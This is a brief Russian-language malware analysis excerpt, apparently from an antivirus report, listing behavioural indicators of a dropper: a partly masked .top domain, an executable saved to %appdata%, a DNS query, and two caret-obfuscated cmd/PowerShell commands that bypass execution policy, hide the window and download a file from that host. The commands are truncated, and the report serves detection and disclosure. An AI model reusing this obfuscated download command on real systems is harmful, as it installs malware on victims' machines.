Техническая информация
- http://do###sinc.top/officemgmts.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWeRSh^ell.^E^x^e^ -^E^x^ECutiONp^O^l^ICY ^B^Y^PaSS ^-n^opr^Of^I^l^E^ -Wi^ND^oWS^tY^Le ^hIdDe^N^ (n^e^w-O^BjE^cT Sys^TE^m.N^E^T.w^e^B^CLie^N^t^)^.dOWnl^OA^DfIle('http://do###...
- DNS ASK do###sinc.top
- '<SYSTEM32>\cmd.exe' /c "PoWeRSh^ell.^E^x^e^ -^E^x^ECutiONp^O^l^ICY ^B^Y^PaSS ^-n^opr^Of^I^l^E^ -Wi^ND^oWS^tY^Le ^hIdDe^N^ (n^e^w-O^BjE^cT Sys^TE^m.N^E^T.w^e^B^CLie^N^t^)^.dOWnl^OA^DfIle('http://do###...' (со скрытым окном)